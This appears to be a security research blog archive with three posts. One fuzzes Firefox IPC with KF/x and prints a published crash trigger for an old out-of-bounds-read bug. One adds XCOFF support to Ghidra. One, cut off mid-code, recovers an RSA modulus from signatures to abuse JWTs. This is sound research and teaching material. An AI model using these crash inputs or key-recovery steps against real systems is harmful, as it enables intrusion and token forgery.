Fuzzy Snapshots of Firefox IPC

Author: b

In January Mozilla published a post on their Attack & Defense blog about Effectively Fuzzing the IPC Layer in Firefox. In this post the authors pointed out that testing individual components of complex systems (such as a web browser) in isolation should be extended by full-system testing, for which snapshot fuzzing seems like a promising tool. As I’ve been using KF/x – a snapshot fuzzer based on Xen’s virtual machine introspection capabilities – since its first release, this seemed like a perfect challenge to create a realistic demo for the fuzzer and put Mozilla’s suggestions (not to mention my skills) to the test.

This blog post aims to show how a complex, real-life target can be harnessed with KF/x, and to highlight some challenges in the snapshot fuzzing space.

But before we dive into these topics, I’d like to point out that I have zero experience with Firefox, and the majority of this experiment was done in a couple of days’ time. I will approach this experiment as if Firefox were a black-box target from an instrumentation standpoint, but I’ll often cut corners by referring to the source code instead of reversing the binary.

I’d also like to say that sharing one’s failures can provide valuable lessons for others – this is one of those cases where I don’t skimp on learning material, so buckle up!

Snapshot Fuzzing with KF/x

KF/x is first and foremost a harnessing tool: it allows us to capture a snapshot of a Xen domain (VM), inject a test case into its memory, collect code coverage information and sink (crash) events up to some predefined point, and then revert the state. The collected data is then communicated to the outside world through an AFL-compatible shared memory interface. KF/x can be treated as the fuzzer’s target program, while during each test case a virtual machine is executed and inspected for coverage data. While the primary goal of KF/x was targeting kernels, it is capable of harnessing user-land processes on Linux and Windows as well. My primary use case for KF/x is targeting black-box binaries with anti-debug functionality on Windows.

As you can see, KF/x relies on virtualization to execute whole systems. VM snapshots are based on copy-on-write (CoW) memory, which makes restoring snapshots really fast, while the target can run at close to native speed. While this property is admittedly attractive, we will see that virtualization-based instrumentation has some challenges that are easier to solve with emulation-based solutions. A great blog post about setting up a fuzzer of the latter type can be read here (thx for the tip @banyaszvonat!).

You can find more information (including presentations by its author, @tklengyel) about KF/x on its GitHub page.

Invalidating Assumptions

Mozilla’s post provides the reader with tempting information about how to start out with fuzzing the IPC layer:

  • Public bugs affecting the IPC interface – Investigating N-days is always a good way to get familiar with a target
  • Possible snapshot points in the browser’s code flow – Knowing when important things happen is crucial for snapshot fuzzing, esp. when we work with VMs, where (contrary to emulators) the target executes on actual hardware, independently from our introspection code.

I quickly narrowed the listed bugs down to “The Icon Bug”, which is an OOB read, so

  • … it will likely end up in invalid memory access (not a “logic bug”, which would require custom sink definitions for detection)
  • … it has a better chance than a UaF to be detected without additional memory access instrumentation (such as ASAN) – contrary to emulator based solutions, we don’t get to inspect memory accesses of the virtualized target by default

I set up a Debian 10 VM and downloaded Firefox 61a1 from April 2018, close to the date of the bug report. I also cloned the source code of this version and tried to compile it, but it seemed like the bootstrap infrastructure had moved on from this old code. Fortunately, the binaries were not stripped, which helped a lot.

The first thing we need to make KF/x work is a snapshot of the virtual machine at a point in time where our controlled input is already loaded in memory, but its parsing hasn’t started yet. We will mark this state with a breakpoint, and use VM instrumentation to manipulate the input buffer directly in the VM’s memory, then let the system play with it.

While Mozilla made multiple suggestions about the optimal snapshot location, based on my admittedly sloppy understanding of the corresponding code I believe the mentioned methods are unfortunately too far from this optimal point, as references to the input data are not directly present there. Instead, I looked at the crash report, where the first call outside the fuzzing harness (Mozilla’s, not KF/x) is PContentParent::OnMessageReceived(IPC::Message const&). This looked like a promising method: one that is called every time a new IPC message arrives. Inspecting the code also confirmed that this is indeed a large dispatcher routine that makes indirect calls to message receiver implementations based on a 4-byte identifier in the form of 0x002d00xx.

The bug report also included a minimized test case, which looks like this:

00000000  28 00 00 00 ff ff ff 7f  97 00 2d 00 45 6e 76 50  |(.........-.EnvP|
00000010  6c 69 67 6e 75 7b 6c 75  67 6e 73 00 00 00 00 00  |lignu{lugns.....|
00000020  04 00 00 00 01 00 00 00  9b 9a 9a ba 73 00 00 00  |............s...|
00000030  00 78 69 74 63 6f 64 65  65 72 5f 73 6d 78 69 74  |.xitcodeer_smxit|
00000040  63 00 00 72 5f 73 6d 61                           |c..r_sma|
00000048

Here we can immediately see the 0x002d0097 message type identifier (in assembly we trust: in source we’d “only” see Msg_SetURITitle), INT_MAX, and a likely length value as the first DWORD of the stream. This must be some kind of serialization format.
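The reading of the dump above can be checked with a few lines of Python. This minimal sketch assumes that the first three DWORDs are a little-endian payload size, a routing ID and the message type; calling the second field a routing ID is my assumption based on the Chromium-derived IPC code, and treating the remaining 32 bytes as the header is an inference from 0x48 - 0x28, not something confirmed in Firefox’s source.

```python
import struct

# The minimized trigger from the bug report, transcribed from the hexdump above.
TRIGGER = bytes.fromhex(
    "28000000ffffff7f97002d00456e7650"
    "6c69676e757b6c75676e730000000000"
    "04000000010000009b9a9aba73000000"
    "00786974636f646565725f736d786974"
    "630000725f736d61"
)


def parse_header(msg: bytes) -> dict:
    """Decode the first three DWORDs, assumed to be little-endian
    payload size (uint32), routing ID (int32) and message type (uint32)."""
    payload_size, routing, msg_type = struct.unpack_from("<IiI", msg, 0)
    return {
        "payload_size": payload_size,
        "routing": routing,
        "type": msg_type,
        # Inference, not a documented field: the bytes preceding the payload.
        "header_len": len(msg) - payload_size,
    }


hdr = parse_header(TRIGGER)
print(hex(hdr["type"]), hdr["routing"] == 2**31 - 1, hdr["payload_size"], hdr["header_len"])
# 0x2d0097 True 40 32
```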

The problem at this point was that the OnMessageReceived method got an IPC::Message object from its caller, while I had a file with some bytes in it. How do I inject this serialized stream into the process, so it will be parsed as expected?

A quick look at the decompiled code revealed that the message type ID is read from an address relative to a register value, and when I checked this address in a debugger, I indeed got something that closely resembled the previous stream structure:

Retrieving message type ID
Memory dump at RAX

This was enough for me to do the whole harnessing dance: carefully placing breakpoints in Firefox and noting relevant addresses. When I tested the harness with bare KF/x (running without AFL), the minimized test case crashed the process (inside the VM snapshot), while the one I dragged out of /dev/urandom did not – this wasn’t sound proof, though, that everything was working as expected.

I started suspecting that something was wrong when I couldn’t find the “offending” bytes in the crashing sample, which I wanted to fix so that the sample would survive parsing. Then I launched AFL with my slightly modified samples, and noticed that it recorded crashes even when the message type ID was corrupted, meaning the affected parser could never have been invoked.

I suspected that the buffer I was manipulating wasn’t the (only) region of memory that affected the state of the IPC::Message object. In fact, when searching the memory of the process at our supposed snapshot point, we can find dozens of memory regions that look like the same serialized message.

With other targets, one thing that usually works in similar scenarios is to inject modified input into all candidate buffers with KF/x, and see in which case(s) the execution path changes. In this case, however, I looked for a different, less brute-force approach, largely because the source code of IPC::Message and its parent classes presented a labyrinth of data structures that wouldn’t necessarily contain the serialized input in a single contiguous block of memory.
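Finding the candidate buffers is the easy part of the brute-force approach. Below is a minimal Python sketch, assuming a raw memory dump of the process is already available as bytes (how it is obtained is out of scope) and using the first 12 bytes of the serialized message as the search signature; `find_all` is a hypothetical helper, not part of KF/x.

```python
from typing import List


def find_all(dump: bytes, signature: bytes) -> List[int]:
    """Return the offset of every (possibly overlapping) occurrence of signature."""
    offsets = []
    start = dump.find(signature)
    while start != -1:
        offsets.append(start)
        # Advance by a single byte so overlapping matches are not skipped.
        start = dump.find(signature, start + 1)
    return offsets


# Toy "dump" containing two copies of the message's leading 12 bytes.
signature = bytes.fromhex("28000000ffffff7f97002d00")
dump = b"\x00" * 16 + signature + b"junk" + signature + b"\xcc" * 8
print(find_all(dump, signature))  # [16, 32]
```

Each reported offset would then become an injection target, and the execution traces of the runs would be compared.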

Learning from prior art

How did Mozilla’s fuzzer feed that byte stream to Firefox, so the bug could be found in the first place? Again, the published crash log quickly reveals that the magic is happening in the ProtocolFuzzer::FuzzProtocol method – the relevant parts are the following:

template <typename T>
void FuzzProtocol(T* aProtocol, const uint8_t* aData, size_t aSize,
                  const nsTArray<nsCString>& aIgnoredMessageTypes) {
  while (true) {
    uint32_t msg_size =
        IPC::Message::MessageSize(reinterpret_cast<const char*>(aData),
                                  reinterpret_cast<const char*>(aData) + aSize);
    if (msg_size == 0 || msg_size > aSize) {
      break;
    }
    IPC::Message m(reinterpret_cast<const char*>(aData), msg_size);
    // ...

    if (m.is_sync()) {
      UniquePtr<IPC::Message> reply;
      aProtocol->OnMessageReceived(m, *getter_Transfers(reply));
    } else {
      aProtocol->OnMessageReceived(m);
    }
  }
}

The important part is that IPC::Message has a constructor that accepts a raw byte stream. Later, the resulting object is passed to OnMessageReceived() (of PContentParent, via some C++ magic), so we were on the right track here.

Interestingly, I could find a reference to this magical constructor neither in the decompiled libxul library nor with GDB. In the source, the “missing” constructor was present, of course:

Message::Message(const char* data, int data_len)
    : Pickle(MSG_HEADER_SZ_DATA, data, data_len) {
  MOZ_COUNT_CTOR(IPC::Message);
}

The Pickle reference is part of an initialization list: when an IPC::Message is initialized with a raw buffer in source code, it’s actually the Pickle constructor that gets called. When breaking on this constructor, we can see that it is invoked by IPC::Channel::ChannelImpl::ProcessIncomingMessages(). Since this method processes messages all the time, it’s worth setting a conditional breakpoint so we only see Msg_SetURITitle (aka. 0x2d0097) messages.
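One possible way to express such a condition is sketched below with GDB’s Python API. It assumes the x86-64 System V calling convention, where `this` is passed in RDI, the header size in ESI and the raw `data` pointer in RDX, and that the message type sits at offset 8 of the raw buffer, as in the hexdump of the trigger. The breakpoint location string is hypothetical, and the breakpoint actually used for this post may have looked different.

```python
MSG_SETURITITLE = 0x2D0097


def type_condition(data_reg: str = "$rdx", type_offset: int = 8,
                   msg_type: int = MSG_SETURITITLE) -> str:
    """GDB expression that is true when the DWORD at data + type_offset == msg_type."""
    return f"*(unsigned int *)({data_reg} + {type_offset}) == {msg_type:#x}"


try:
    import gdb  # only importable inside GDB's embedded Python interpreter
except ImportError:
    gdb = None

if gdb is not None:
    # Hypothetical location: narrow it to the (header size, data, length)
    # overload, otherwise the condition is evaluated against unrelated registers.
    bp = gdb.Breakpoint("Pickle::Pickle")
    bp.condition = type_condition()
else:
    print(type_condition())  # *(unsigned int *)($rdx + 8) == 0x2d0097
```

Loaded with GDB’s `source` command, the script sets the breakpoint; run outside GDB it only prints the condition.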

We can confirm this is working by loading any website, so the tab title will change, and the breakpoint will hit.

Interestingly, when I replaced a 0x2d0097 message with the published trigger, ProcessIncomingMessages() discarded it, stating that it’d require too many file descriptors, so the bug didn’t trigger. Even when I patched out the check with GDB, an assertion-like method (MOZ_CrashPrintf()) triggered the SEGFAULT, instead of the one mentioned in the original report. With my limited Firefox knowledge I can’t tell if Mozilla’s fuzzer digs into a “private” interface when calling OnMessageReceived() directly, or if there are legitimate ways to do this when running in a sandboxed process.

Anyway, this is enough to harness this beast (well, kind of, we’re far from the end…), and it would be interesting to find out whether some bug could be reached with the above check in place!

Just Harness Already!

OK, so the plan is this:

  • Set a conditional breakpoint on the Pickle constructor that only triggers when a message with type Msg_SetURITitle is received. We know that this constructor already performs some interesting parsing.
  • Put an INT3 (0xCC) breakpoint on an upcoming instruction – this will signal KF/x that it should take a snapshot of the VM. Note the first byte of the instruction, as KF/x will have to restore this value, just as a debugger in the guest would. After this breakpoint is hit, any other breakpoint will trigger the restoration of the snapshot state from dom0.
  • Limit execution of the process: my usual approach is to look at the stack trace and place a breakpoint on a return address further up the stack. This way, all potential returns from the deeper frames are covered.
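The byte bookkeeping in the second step can be modeled in a few lines. This is a toy Python sketch over a bytearray standing in for guest memory, not how KF/x or rwmem actually write to the VM; a real debugger typically also has to move the instruction pointer back by one byte after the trap, which is not modeled here.

```python
INT3 = 0xCC


class BreakpointTable:
    """Toy software breakpoints over a bytearray standing in for guest memory."""

    def __init__(self, memory: bytearray):
        self.memory = memory
        self.saved = {}  # address -> original first byte of the instruction

    def insert(self, addr: int) -> None:
        if addr in self.saved:
            return  # already armed; don't overwrite the saved byte with 0xCC
        self.saved[addr] = self.memory[addr]
        self.memory[addr] = INT3

    def restore(self, addr: int) -> None:
        # Put the original byte back, as a debugger (or KF/x) must before resuming.
        self.memory[addr] = self.saved.pop(addr)


mem = bytearray(b"\x55\x48\x89\xe5")  # push rbp; mov rbp, rsp
bps = BreakpointTable(mem)
bps.insert(0)
print(mem.hex())  # cc4889e5
bps.restore(0)
print(mem.hex())  # 554889e5
```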

When this is all set up in the guest, we have to start KF/x in setup mode, so it starts listening for the first breakpoint interrupt. When we continue execution in the guest, the first INT3 triggers the snapshot capture (and the restoration of the original instruction byte).

After this we can start playing with KF/x: when executed outside the fuzzer, it just runs until the first breakpoint, displays the crash/no crash verdict, and optionally the recorded instruction trace (--debug). While doing these test runs, I noticed that if the file descriptor check fails, the VM enters an infinite loop. This is because the VM’s device model is removed from the snapshot, so when Firefox attempts to write some warnings to logs, the target device is no longer there. This was easy to solve by looking up code addresses noted during harnessing, and using the rwmem utility that comes with KF/x to simply put another breakpoint inside the body of that nasty if(we don't have enough descriptors){} statement, so the harness treats it as a “stop” event for the fuzz iteration.

The process is shown in the following video:

We can see that we are fuzzing something, and that AFL finds crashes almost immediately. Unfortunately, these are just other assertions, showing that besides the file descriptor check there are several more checks before OnMessageReceived() that our serialized message has to survive. By adding new breakpoints to the relevant assertion methods (again, with rwmem), these results can be filtered out, and performance improves as well.
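Conceptually, every breakpoint in the harness ends up in one of three buckets. The toy Python sketch below models that decision; the addresses are made up, and this is not KF/x’s configuration mechanism, just an illustration of why assertion handlers belong with the “stop” events rather than with the crash sinks.

```python
from enum import Enum


class Verdict(Enum):
    CONTINUE = "continue"  # not a harness breakpoint, keep executing
    STOP = "stop"          # uninteresting end of iteration: revert the snapshot
    CRASH = "crash"        # sink hit: revert and report a crash to the fuzzer


def classify(addr: int, stops: frozenset, sinks: frozenset) -> Verdict:
    """Map a breakpoint hit to what the harness should do with this iteration."""
    if addr in sinks:
        return Verdict.CRASH
    if addr in stops:
        return Verdict.STOP
    return Verdict.CONTINUE


# Hypothetical addresses, for illustration only.
STOPS = frozenset({
    0x7F0000001000,  # return address picked from the stack trace
    0x7F0000002000,  # body of the "not enough file descriptors" branch
    0x7F0000003000,  # assertion handler such as MOZ_CrashPrintf()
})
SINKS = frozenset({0xFFFFFFFF81000000})  # e.g. the guest's page fault handler

print(classify(0x7F0000003000, STOPS, SINKS))  # Verdict.STOP
```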

Speaking of performance: when I started these experiments, my VM config and KF/x version were not in sync, so I couldn’t use Intel PT for coverage tracing. Without HW support, KF/x places breakpoints on the fly into the target, triggering a context switch at each basic block. This approach is very slow, yielding less than 10 c/s in AFL. After upgrading my system, I could achieve ~3000 c/s with Intel PT, with peaks over 4000. This is not a benchmarking post, though.

The new assertions we’re hitting here are mostly related to so-called “sentinels”: constant DWORD identifiers in the serialized messages. Fuzzing builds of Firefox disable sentinel checks, so the published trigger was riddled with invalid values that I fixed manually in the serialized file. “Magic” values like these render an uninformed input generator useless, of course, but this is not relevant to our current experiment.

With this “valid” serialized message, I could reach a state where the parser would want to read past the end of the buffer. Pickle objects maintain a pointer to the end of their buffer and one for the current read position. The following screenshot shows that these two pointers are equal, while execution reaches ipc::ReadIPDLParam() that would read past the end pointer:

Almost overread

This is not a bug, as the Read…() methods of PickleIterator check whether they would read past the end pointer stored in the object, but it shows that something is fishy with the object that could cause trouble in later phases of parsing – given that execution can reach that point, of course…
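The bounds check that prevents the overread can be illustrated with a toy read cursor. This Python sketch is loosely modeled on the description above, not on Firefox’s PickleIterator code: it keeps an explicit end position and returns None instead of reading past it.

```python
import struct
from typing import Optional


class ReadIterator:
    """Toy read cursor with an explicit end position; not Firefox's API."""

    def __init__(self, buf: bytes):
        self.buf = buf
        self.pos = 0          # current read position
        self.end = len(buf)   # one past the last readable byte

    def read_uint32(self) -> Optional[int]:
        # Refuse any read that would cross the end position instead of over-reading.
        if self.end - self.pos < 4:
            return None
        (value,) = struct.unpack_from("<I", self.buf, self.pos)
        self.pos += 4
        return value


it = ReadIterator(b"\x2a\x00\x00\x00")
print(it.read_uint32(), it.pos == it.end, it.read_uint32())  # 42 True None
```

The state after the first read, with the position equal to the end, mirrors the screenshot: any further read is refused rather than performed.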

It’s also worth noting that this deserialization from the raw buffer to a Pickle happens in a different thread from where we’ve set our original buffer. Multi-threading can make it difficult to match test inputs with observed behaviors, and in case of KF/x we can only hope that no device access happens (remember: we don’t have devices during fuzzing) until the thread scheduler prioritizes the Message parser thread within the same process.

Back-of-a-napkin view of message reception

So, in summary, while inspecting the original fuzzer helped to identify a part of the code where serialized data can be fed to the system, saving a snapshot here is not good enough to reach the message parsing logic affected by our test bug. It is also pretty clear that the trigger published in the original bug report will not be useful against a standard build, because numerous assertions are in the way.

Back to the other side

My little detour on the other side of the message handler wasn’t in vain: I learned a lot about the structure of the Pickles, the Message objects created from them, and the mechanics of message passing between the different threads of the target process. The initial heaps of false positives resulting from the original trigger also made sense now, having dealt with the sentinels and other IPDL format checks.

Based on this, I could handcraft a Pickle object for ProcessIncomingMessages() and catch it when it arrived at OnMessageReceived(). It turned out that the buffer I identified on my first try was in fact the one processed by OnMessageReceived() with a PickleIterator.
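Handcrafting such a message mostly means getting the header right. Here is a minimal Python sketch reusing the layout inferred from the minimized trigger (little-endian payload size, routing value and message type, with a 32-byte header). The zero-filled remainder of the header is an assumption, and sentinels or any alignment rules of the real Pickle format are not handled.

```python
import struct

HEADER_LEN = 32             # inferred from the minimized trigger (0x48 - 0x28)
INT_MAX = 2**31 - 1         # routing value seen in the published trigger
MSG_SETURITITLE = 0x2D0097  # message type ID of Msg_SetURITitle


def build_message(payload: bytes, msg_type: int = MSG_SETURITITLE,
                  routing: int = INT_MAX) -> bytes:
    """Prepend an assumed little-endian header (size, routing, type), zero-filling
    the remaining header fields; sentinels and alignment are not handled."""
    header = struct.pack("<IiI", len(payload), routing, msg_type)
    return header.ljust(HEADER_LEN, b"\x00") + payload


msg = build_message(b"example")  # arbitrary payload
print(len(msg), msg[:12].hex())  # 39 07000000ffffff7f97002d00
```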

The process of harnessing the side of the message parser thread is shown in the following demo:

While the process is basically the same as it was for the message receiver thread, there are a couple of things to notice.

First, a breakpoint is placed on MOZ_CrashPrintf(), which is usually called when different assertions are hit. The breakpoint here triggers a revert without touching a sink, improving the signal-to-noise ratio.

Second, the execution of libc’s __tls_get_addr() is inspected briefly, for no apparent reason. This is the result of a message from the Demo Gods: when I was recording a previous version of this video, I had an almost perfect take, ruined by the target crashing even with unmodified data. After much frustration I ended up injecting some handcrafted buffers into the target, and confirmed that all calls to this library function crashed. A likely explanation for this (taking into account that the problem is not deterministic) is that the memory page holding the library code was paged out when the snapshot was taken, so the page fault handler – hooked by KF/x as a crash sink – got called. A nice summary of this problem and some possible solutions is available here from the HVMI project.

As you can see, manipulating the originally identified buffer when executing OnMessageReceived() results in numerous different execution paths, and even some crashes – which are, again, other assertions. At this point I decided to give this project a break, and write up my experiences, as I felt there’s already much to think about.

Conclusions

So what can one make out of all this? Here are some of my thoughts:

  • User input is generally delivered to programs as some kind of serialized stream of bytes (file, network packet, etc.), which is easiest to target with the presented approach. However, interesting functionality may only be reachable via complex in-memory objects – harnessing in such cases may require target-specific tweaking.
  • Working with VMI is pretty easy, but figuring out the runtime memory layout of complex objects isn’t. Snapshot fuzzers can be supported by test APIs that accept simple(r) types, and invoke constructors and deserializers internally.
  • Copies of user input are often stored at multiple places in memory. It is important to determine early if we target the right address by executing well thought-out test cases and inspecting if our input affects the code flow at all. In many cases, the simplest solutions work best.
  • Collecting events from the target VM is a crucial part of virtualization-based snapshot fuzzing. In the case of coverage tracking, the performance cost of context switching can easily skyrocket. The usual solutions to this are HW assistance (e.g. Intel PT, BTS) or coarser tracking (e.g. periodic sampling; not tracking “boring” paths).
  • Test paths may differ from the ones reachable during real execution. This can be beneficial for defense-in-depth, but not necessarily for finding exploitable vulnerabilities.
  • Bug “enrichment” (like ASAN) for virtualization based snapshot fuzzers looks like an important area to research further.
  • The lack of device model introduces some challenges. For example, when reading large files, the entirety of the file may not be present in the memory at once, and fuzzing needs to be split into separate phases. On the other hand, this lack of state guarantees that the fuzzer always returns to the same state and doesn’t leak memory :)

I’m pretty sure these experiments could be improved, so if you have some ideas (or think I made another mistake somewhere), please reach out!

Finally, I’d like to thank Christoph Kerschbaumer and Christian Holler for their inspiring blog post – I wish we could see more of its kind! I’d also like to thank Tamás K. Lengyel once again for his amazing work on bringing snapshot fuzzing to the masses with KF/x!

Featured image from Prodigy’s official Smack My Bitch Up music video – which is apparently too much for the Brave New Web of 2021.


Adding XCOFF Support to Ghidra with Kaitai Struct

Author: b

It’s not a secret that we at Silent Signal are hopeless romantics, especially when it comes to classic Unix systems (1, 2, 3). Since some of these systems – which still run business-critical applications at our clients – are based on some “exotic” architectures, we have a nice hardware collection in our lab, so we can experiment on bare metal.

We are also spending quite some time with the Ghidra reverse engineering framework that has built-in support for some of the architectures we are interested in, so the Easter holidays seemed like a good time to bring the two worlds together.

My test target was an RS/6000 system running IBM AIX. The CPU is a 32-bit, big-endian PowerPC, which is already (mostly?) supported by Ghidra, but to my disappointment, the file format was not recognized when I imported one of AIX’s default utilities into the framework. The executable format used by AIX is XCOFF, and as it turned out, Ghidra only has a partial implementation for it.

At this point I had multiple choices: I could start working on the existing XCOFF code, or try to hack the fully functional COFF loader just enough to make it accept XCOFF too, but neither option made my heart beat faster:

  • Java doesn’t have unsigned primitives, which makes parsing byte streams painful
  • The existing ~1000 LoC XCOFF implementation includes a wide set of structure definitions with basic getters and setters, but it doesn’t handle the more complex semantics of the input
  • The COFF loader expects everything to be little-endian – adding support for BE would require rewriting everything

Instead, I decided to start from scratch and develop code that:

  • is reusable in tools other than Ghidra
  • is easy to read, write and extend
  • has excellent debug tools

Ghidra ❤️ Kaitai

The above benefits are provided by Kaitai Struct, “a declarative binary format parsing language”. Instead of implementing a parser in a particular (procedural) language and framework, with Kaitai we can describe the binary format in a YAML-like structure (I know, YAML===bad, but believe me, this stuff works), and then let the Kaitai compiler produce parser code in different languages for us from the same declaration.

Although my Kaitai-fu (picked up mainly through these challenges at Avatao) was rusty, I managed to put together a partial, hacky, but working format declaration for XCOFF32 in a couple of hours, based on IBM’s documentation.

This approach also had some benefits from a research standpoint, as by reading the specification I could spot

  • inconsistencies between specification and implementation
  • redundant information (e.g. size specifications) in the spec

both of which can lead to interesting parsing bugs! (After this, I wasn’t surprised when, while digging through Google, I found that IDA, which has built-in XCOFF support, has suffered from such bugs in the past.)

Coming back to Ghidra development, I could create two implementations from the same Kaitai structure: one in Python, one in Java. I could import the Java implementation as a class in my Ghidra Loader and debug Ghidra-specific code in Eclipse, while checking the semantic correctness of the parser and exploring the API more comfortably in a Python REPL:

$ python -i test.py portmir
.text 0x20
.data 0x40
.bss 0x80
.loader 0x1000
>>> hex(portmir.section_headers[0].s_vaddr)
'0x10000100'

… or just browse the parsed structures in KT’s awesome WebIDE.
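For comparison with the Kaitai-generated parser, here is what a hand-written Python equivalent for the headers might look like. The field layout (a 20-byte big-endian file header with magic 0x01DF, followed by the optional header and 40-byte section headers) follows my reading of IBM’s XCOFF32 documentation; the image in the example is synthetic, and its flag values 0x20 and 0x40 mirror the .text and .data flags printed in the REPL session.

```python
import struct

FILE_HDR = struct.Struct(">HHiIiHH")     # XCOFF32 file header, 20 bytes
SECTION_HDR = struct.Struct(">8s6IHHI")  # XCOFF32 section header, 40 bytes
XCOFF32_MAGIC = 0x01DF


def parse_sections(image: bytes) -> list:
    """Return name, virtual address, size, file offset and flags of each section."""
    magic, nscns, _timdat, _symptr, _nsyms, opthdr, _flags = FILE_HDR.unpack_from(image, 0)
    if magic != XCOFF32_MAGIC:
        raise ValueError(f"not an XCOFF32 file (magic {magic:#06x})")
    offset = FILE_HDR.size + opthdr  # section table follows the optional header
    sections = []
    for _ in range(nscns):
        (name, _paddr, vaddr, size, scnptr, _relptr, _lnnoptr,
         _nreloc, _nlnno, flags) = SECTION_HDR.unpack_from(image, offset)
        sections.append({
            "name": name.rstrip(b"\x00").decode("ascii"),
            "vaddr": vaddr, "size": size, "scnptr": scnptr, "flags": flags,
        })
        offset += SECTION_HDR.size
    return sections


# Synthetic two-section image; the values are made up.
image = (FILE_HDR.pack(XCOFF32_MAGIC, 2, 0, 0, 0, 0, 0)
         + SECTION_HDR.pack(b".text", 0x10000100, 0x10000100, 0x200, 0x100, 0, 0, 0, 0, 0x20)
         + SECTION_HDR.pack(b".data", 0x20000300, 0x20000300, 0x80, 0x300, 0, 0, 0, 0, 0x40))
for s in parse_sections(image):
    print(s["name"], hex(s["flags"]))
```

Every width and offset above is bookkeeping that the Kaitai declaration handles for us, in every target language at once.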

Integrating the generated Java code with Ghidra was a piece of cake:

  • Add Kaitai’s runtime library to the project
  • Wrap the Java byte array provided by Ghidra’s ByteProvider with ByteBufferKaitaiStream, and use the appropriate constructor of the generated class

After the Ghidra-Kaitai interface was set, the only things left were setting the default big-endian PowerPC language, letting Kaitai parse the section headers of the XCOFF file, and mapping them to the Program memory. After this, I could immediately see convincing disassembly and decompilation(!) results:

First disassembly and decompilation result

(Mysterious) Symbols of Love

To give Ghidra more hints about the program structure, I proceeded by parsing symbol information. I don’t want to dive deep into the XCOFF format in this post, but in short, there is a symbol table defined by the .loader section of the binary, that holds information about imports and exports, and there is an optional symbol table potentially referenced by the main header for more detailed information. XCOFF can also contain a TOC (table of contents) that contains valuable structural information for reverse engineering if present.

Since the small utility I used for testing only contained a loader symbol table, I implemented parsing for that, and managed to find the entry function of the file, which was not identified during automatic analysis.

To check my results, I also loaded the sample file into IDA, and to my surprise, this tool showed many more symbols than the loader symbol table! I searched for some of the missing symbols in the binary and found a single occurrence of every missing function name inside the .text section:

Length-prefixed string structure inside the .text section

After a lot of digging (and asking on Twitter) I found that this arrangement matches the Symbol Table Layout described in the specification:

Source: https://www.ibm.com/docs/en/aix/7.2?topic=formats-xcoff-object-file-format

So far, I haven’t been able to fully decipher this layout, but my working theory is that while the optional symbol table and TOC were removed by stripping, the per-function stabs remained untouched. If so, this is good news for reverse engineers interested in the XCOFF format :)

Update 2021.04.07: As /u/ohmantics pointed out, this is actually the Traceback Table of the function.  Proper support for these structures coming soon!

While the parser for this information should be placed in a proper analyzer module, for now I put together a simple Python script that tries to parse string structures found between declared functions, and renames functions accordingly:

Pseudocode with additional symbol names
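The idea behind such a script can be sketched as a heuristic scan. This is not the script used for this post: it is a hypothetical Python helper that looks for a 2-byte big-endian length followed by that many identifier characters, which is my assumption about the layout in the screenshot; the length bounds and the allowed character set are arbitrary choices.

```python
import re
from typing import List, Tuple

# Allowed name characters (a guess: C identifiers plus '.' and '$').
IDENT = re.compile(rb"[A-Za-z_.$][A-Za-z0-9_.$]*")


def find_prefixed_names(region: bytes, min_len: int = 3,
                        max_len: int = 256) -> List[Tuple[int, str]]:
    """Heuristically find names stored as a 2-byte big-endian length + bytes."""
    hits = []
    for off in range(len(region) - 2):
        length = int.from_bytes(region[off:off + 2], "big")
        if not min_len <= length <= max_len:
            continue
        candidate = region[off + 2:off + 2 + length]
        if len(candidate) == length and IDENT.fullmatch(candidate):
            hits.append((off, candidate.decode("ascii")))
    return hits


# Toy region: padding, a length-prefixed "main", then a PowerPC blr (0x4e800020).
region = b"\x00" * 4 + b"\x00\x04main" + b"\x4e\x80\x00\x20"
print(find_prefixed_names(region))  # [(4, 'main')]
```

In Ghidra, each hit would then be attributed to the preceding function and used to rename it; that part is left out here.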

Summary

This blog post showed that Kaitai Struct can be an effective tool to add new formats to Ghidra. Parser development is a tedious and error-prone process that should be outsourced to machines, which don’t get frustrated at the 92nd bitfield definition, and can produce the same, correct implementation for every instance (provided you don’t screw up the parser declaration itself ;) ).

The post also allowed a peek inside the XCOFF format, which seems to be worth some security-minded study in applications that parse it.

We hope that our published code will attract contributors that are also interested in bringing XCOFF to Ghidra or even to other research tools:

Featured image is from Wikipedia (our boxes look much cooler)


Abusing JWT public keys without the public key

Author: b

This blog post is dedicated to those brave souls who dare to roll their own crypto

The RSA Textbook of Horrors

This story begins with an old project of ours, where we were tasked with verifying (among other things) how a business application handles digital signatures of transactions, to comply with four-eyes principles and other security rules.

The application used RSA signatures, and after a bit of head scratching about why our breakpoints on the usual OpenSSL APIs didn’t trigger while those placed in the depths of the library did, we realized that the developers had implemented what people in security like to call “Textbook RSA” in its truest sense. This of course led to red markings in the report and massive delays in development, but also presented us with some unusual problems to solve.

One of these problems stemmed from the fact that although we could present multiple theoretical attacks on the scheme, the public keys used in this application weren’t published anywhere, and without them we had no starting point for a practical attack.

At this point it’s important to remember that although public key cryptosystems guarantee that the private key can’t be derived from the public key, signatures, ciphertexts, etc., there are usually no such guarantees for the public key! In fact, the good people at the Cryptography Stack Exchange presented a really simple solution: just find the greatest common divisor (GCD) of the differences s^e - m computed for all available message-signature pairs (where m is the padded message and s is its signature). Without going into the details of why this works (a more complete explanation is here), there are a few things worth noting:

  • An RSA public key is an (n,e) pair of integers, where n is the modulus and e is the public exponent. Since e is usually some hardcoded small number, we are only interested in finding n.
  • Although RSA involves large numbers, really efficient algorithms to find the GCD of numbers have existed since ancient times (we don’t have to do brute-force factoring).
  • Although the presented method is probabilistic, in practice we can usually just try all possible answers. Additionally, our chances grow with the number of known message-signature pairs.
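The reasoning fits in a few lines: for a textbook signature s = m^d mod n we have s^e ≡ m (mod n), so n divides s^e - m for every pair, and therefore divides the GCD of these differences. The Python sketch below demonstrates this with toy primes and e = 3, so plain integers suffice; with e = 65537 and 2048-bit signatures each s^e has over a hundred million bits, which is where a library like gmpy2 comes in. For JWTs, m is the padded message representative, not the raw token. The trial division that strips small cofactors is a simplification that only works while its bound stays below the prime factors of n.

```python
from math import gcd


def recover_modulus(pairs, e, trial_bound=10_000):
    """Recover n from (m, s) pairs of textbook RSA signatures, s = m^d mod n.

    s^e = m (mod n), so n divides every s^e - m and therefore their GCD.
    The GCD may still carry small cofactors, which are divided out.
    """
    g = 0
    for m, s in pairs:
        g = gcd(g, pow(s, e) - m)  # plain integer power, no modular reduction
    for f in range(2, trial_bound):
        while g > 1 and g % f == 0:
            g //= f
    return g


# Toy key: both primes are 2 mod 3, so e = 3 is a valid public exponent.
p, q, e = 10007, 10037, 3
n = p * q
d = pow(e, -1, (p - 1) * (q - 1))  # modular inverse, Python 3.8+
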